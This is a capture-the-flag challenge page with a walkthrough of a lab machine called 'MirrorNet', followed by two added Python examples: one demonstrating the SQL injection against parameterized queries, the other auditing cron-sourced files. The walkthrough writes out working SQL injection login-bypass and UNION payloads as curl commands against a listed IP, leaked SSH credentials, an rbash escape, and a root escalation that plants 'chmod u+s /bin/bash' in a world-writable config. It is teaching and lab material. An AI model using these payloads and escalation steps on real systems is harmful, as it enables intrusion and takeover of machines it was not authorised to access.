Mirage

MirrorNet Corp ran a covert data intelligence platform. After their takedown, one server was left running. The admin swore it was hardened — 'everything real is behind another layer'. Dozens of researchers have tried. They all came back with flags. Every one of them was fake.

💰 Season 1 Vault

Somewhere inside this machine a key fragment is concealed — not in plain sight, not in the obvious loot. Think beyond the standard exploit chain to find it. The fragment is encoded; the encoding method is hinted at within the machine itself.

The first player who locates, decodes, and enters the key wins permanently. There is no second place.

Community Walkthroughs

00x003 B 24 May 2026

Walkthrough: MirrorNet

Challenge Description:
A multi-service Linux target exposes a vulnerable Flask portal, anonymous FTP access, an exposed Redis instance, and a restricted SSH shell. Abuse SQL injection, enumerate internal services, escape a restricted shell, and exploit a world-writable cron-sourced configuration file to gain root access.


1. Enumeration

Initial scanning reveals multiple exposed services:

  • 30576/tcp → SSH
  • 30577/tcp → Flask/Werkzeug application
  • 30578/tcp → Nginx document viewer
  • 30579/tcp → FTP
  • 30580/tcp → Redis

Port Scan

nmap -sV -p 30576,30577,30578,30579,30580 23.92.29.178

Results

30576/tcp open  ssh     OpenSSH 8.9p1 Ubuntu
30577/tcp open  http    Werkzeug httpd 3.1.8
30578/tcp open  http    nginx 1.18.0
30579/tcp open  ftp     vsftpd 2.0.8 or later
30580/tcp open  redis   Redis key-value store

2. Exploiting the Flask Login

Browsing the Flask application redirects to /login.

Request

curl -i http://23.92.29.178:30577/

The login form is vulnerable to SQL injection.

SQL Injection Login Bypass

curl -i -X POST http://23.92.29.178:30577/login \
-d "username=' OR 1=1-- -&password=test"

Result

HTTP/1.1 302 FOUND
Location: /dashboard
Set-Cookie: session=...

The injection successfully authenticates as admin.


3. Exploiting SQL Injection in Search

The /search endpoint is also vulnerable.

Request

curl -s \
"http://23.92.29.178:30577/search?q=%27%20OR%201%3D1--%20-" \
-b "session=COOKIE"

Result

admin
guest
elara
root
gitadmin

Interesting notes appear:

Analyst account. Shadow backup:
$6$mirrornet2026$AAAAAAAAAAAAAAAAAAAAAAAAAAAA

Guest access only — restricted shell on SSH

4. Enumerating the SQLite Database

The application uses SQLite.

Version Enumeration

curl -s \
"http://23.92.29.178:30577/search?q=%27%20UNION%20SELECT%201,sqlite_version(),3--%20-" \
-b "session=COOKIE"

Result

3.37.2

Enumerating Tables

curl -s \
"http://23.92.29.178:30577/search?q=%27%20UNION%20SELECT%201,sql,3%20FROM%20sqlite_master%20WHERE%20name=%27flags%27--%20-" \
-b "session=COOKIE"

Result

CREATE TABLE flags (
    id INTEGER PRIMARY KEY,
    flag TEXT
)

Reading the Fake Flag

curl -s \
"http://23.92.29.178:30577/search?q=%27%20UNION%20SELECT%201,flag,3%20FROM%20flags--%20-" \
-b "session=COOKIE"

Result

NOTAFLAG{sql_too_easy_keep_digging}

The challenge intentionally provides a decoy flag.


5. Anonymous FTP Access

Anonymous FTP login is enabled.

FTP Login

ftp 23.92.29.178 30579

Directory Listing

backup_notes.txt
employees.csv
fake_flag.txt

Interesting FTP Note

Previous credentials (M1rr0rAdm!n) are still valid for portal and guest SSH access.

This reveals valid SSH credentials for the guest account.


6. SSH Access as Guest

SSH Login

ssh guest@23.92.29.178 -p 30576

Password

M1rr0rAdm!n

After login, the shell is heavily restricted (rbash).


7. Enumerating the Restricted Shell

Interesting notes are present:

TODO list:
  - Check /opt/dev/credentials.txt
  - mirrorpeek binary in /usr/local/bin looks odd

A SUID binary exists:

ls -l /usr/local/bin/mirrorpeek

Result

-rwsr-xr-x 1 root root 16408 /usr/local/bin/mirrorpeek

Running it only reveals fake information:

Vault key: FAKE{suid_aint_the_path_here_rookie}

8. Escaping rbash

The restricted shell exports:

export PATH=/home/guest/bin
readonly PATH

The writable ~/bin directory allows execution of custom scripts.

Create a Shell Wrapper

printf '#!/bin/bash\n/bin/bash\n' | tee bin/sh
chmod +x bin/sh

Execute

sh

Result

bash-5.1$

The restricted shell is bypassed.


9. Enumerating Sensitive Files

With a normal shell, enumerate /opt.

Enumeration

find /opt -maxdepth 3 -type f 2>/dev/null

Interesting Files

/opt/dev/credentials.txt
/opt/mirrornet/scripts/health_check.sh
/opt/mirrornet/config/env.conf

The credentials file is another decoy.


10. Discovering the Privilege Escalation

Health Check Script

cat /opt/mirrornet/scripts/health_check.sh

Result

#!/bin/bash
source /opt/mirrornet/config/env.conf

mkdir -p "$LOG_DIR"
echo "health_check OK" >> "$LOG_DIR/health.log"

The script sources a configuration file as root.


Checking Permissions

ls -l /opt/mirrornet/config/env.conf

Result

-rw-rw-rw- 1 root root 97 env.conf

The configuration file is:

  • root-owned
  • world writable
  • sourced by a root cron job

11. Root Cron Job

Cron Entry

cat /etc/cron.d/mirrornet

Result

* * * * * root /opt/mirrornet/scripts/health_check.sh

Every minute, root executes the vulnerable script.


12. Privilege Escalation to Root

Overwrite the sourced configuration file with a malicious payload.

Payload

printf 'chmod u+s /bin/bash\n' > /opt/mirrornet/config/env.conf

Wait for cron execution.

Then execute:

/bin/bash -p

Result

uid=1002(guest) gid=1002(guest) euid=0(root)

Root shell obtained.


13. Capturing Flags

User Flag

cat /home/elara/user.txt

Result

flag{3l4ra_s33s_4ll_r3fl3ct10ns}

Root Flag

cat /root/root.txt

Result

flag{m1rr0rn3t_c0mpl3t3ly_sh4tt3r3d}

Key Takeaways

  1. SQL Injection Still Leads to Full Compromise
    Unsanitized SQL queries exposed:

    • Authentication bypass
    • Database enumeration
    • Internal application details
  2. Anonymous FTP Frequently Leaks Sensitive Information
    Backup notes disclosed valid SSH credentials.

  3. Restricted Shells Are Not Security Boundaries
    Writable directories in PATH allowed escaping rbash.

  4. World-Writable Config Files Are Dangerous
    Sourcing attacker-controlled files as root results in immediate privilege escalation.

  5. Cron Jobs Must Never Trust Writable Files
    The root cron job executed a script that sourced a globally writable configuration file.

  6. SUID Binaries Can Distract from the Real Attack Path
    The mirrorpeek binary was a deliberate rabbit hole while the actual escalation vector was cron misconfiguration.
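
Added example (not part of the walkthrough or the challenge's code): the login bypass and the three-column UNION on /search from steps 2 to 4, reproduced against an in-memory SQLite database next to the parameterized form that neutralizes both. The `users` table layout, its rows and the function names are assumptions; only the `flags` schema and the payload strings come from the page.

```python
import sqlite3

def make_db():
    """Constructed sample data; plaintext passwords only to keep the demo short."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT,
                            password TEXT, note TEXT);
        CREATE TABLE flags (id INTEGER PRIMARY KEY, flag TEXT);
        INSERT INTO users (username, password, note) VALUES
            ('admin', 'constructed-admin-pw', 'Portal administrator'),
            ('guest', 'constructed-guest-pw', 'Guest access only');
        INSERT INTO flags (flag) VALUES ('NOTAFLAG{constructed_decoy}');
    """)
    return db

def login_vulnerable(db, username, password):
    # String formatting lets a quote in `username` close the literal early,
    # so the rest of the input is parsed as SQL.
    sql = ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
           % (username, password))
    row = db.execute(sql).fetchone()
    return row[0] if row else None

def login_safe(db, username, password):
    # Placeholders bind the values as data; quotes and comment markers stay literal.
    row = db.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password)).fetchone()
    return row[0] if row else None

def search_vulnerable(db, q):
    sql = "SELECT id, username, note FROM users WHERE username LIKE '%" + q + "%'"
    return db.execute(sql).fetchall()

def search_safe(db, q):
    # The wildcard is added to the bound value, not to the SQL text.
    return db.execute(
        "SELECT id, username, note FROM users WHERE username LIKE ?",
        ("%" + q + "%",)).fetchall()

if __name__ == "__main__":
    db = make_db()
    bypass = "' OR 1=1-- -"
    union = "' UNION SELECT 1,flag,3 FROM flags-- -"
    print("vulnerable login:", login_vulnerable(db, bypass, "test"))
    print("safe login:      ", login_safe(db, bypass, "test"))
    print("vulnerable search:", search_vulnerable(db, union))
    print("safe search:      ", search_safe(db, union))
```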
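
Added example (not part of the walkthrough or the challenge's code): a small audit for the misconfiguration in steps 10 and 11, which reads `/etc/cron.d`-style entries, follows each root-run script to the files it sources, and reports any whose file or directory is group/world-writable or not owned by the expected user. The function names are assumptions, and it handles only literal `source`/`.` paths and five-field schedule lines.

```python
import os
import re
import stat

# Matches `source FILE` or `. FILE` at the start of a shell line (literal paths only).
SOURCE_RE = re.compile(r'^\s*(?:source|\.)\s+["\']?([^\s"\';]+)')

def cron_d_jobs(text):
    """Yield (user, script) from /etc/cron.d-style lines: 5 time fields, user, command."""
    for line in text.splitlines():
        fields = line.split(None, 6)
        if line.lstrip().startswith("#") or len(fields) < 7:
            continue  # comments, blank lines, VAR=value assignments
        yield fields[5], fields[6].split()[0]

def sourced_files(script):
    """Paths the script pulls into its own shell with `source` or `.`."""
    with open(script, encoding="utf-8", errors="replace") as fh:
        return [m.group(1) for m in map(SOURCE_RE.match, fh) if m]

def write_risks(path, owner_uid=0):
    """Reasons `path` is unsafe to source from a job running as owner_uid."""
    risks = []
    # A writable parent directory lets the file be replaced, so check both.
    for target in (path, os.path.dirname(os.path.abspath(path))):
        st = os.stat(target)
        if st.st_uid != owner_uid:
            risks.append(f"{target}: owned by uid {st.st_uid}")
        if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            mode = stat.S_IMODE(st.st_mode)
            risks.append(f"{target}: mode {mode:o} is group/world-writable")
    return risks

def audit(cron_text, owner_uid=0):
    """Map each root-run script to the risky files it sources."""
    report = {}
    for user, script in cron_d_jobs(cron_text):
        if user != "root" or not os.path.isfile(script):
            continue
        risks = [r for f in sourced_files(script) if os.path.exists(f)
                 for r in write_risks(f, owner_uid)]
        if risks:
            report[script] = risks
    return report

if __name__ == "__main__":
    with open("/etc/cron.d/mirrornet") as fh:  # path from the walkthrough
        for script, risks in audit(fh.read()).items():
            print(script, *risks, sep="\n  ")
```

On the machine described here, the fix is to make `env.conf` writable by root only (mode 644) or to have the script read expected `KEY=VALUE` pairs instead of sourcing the file.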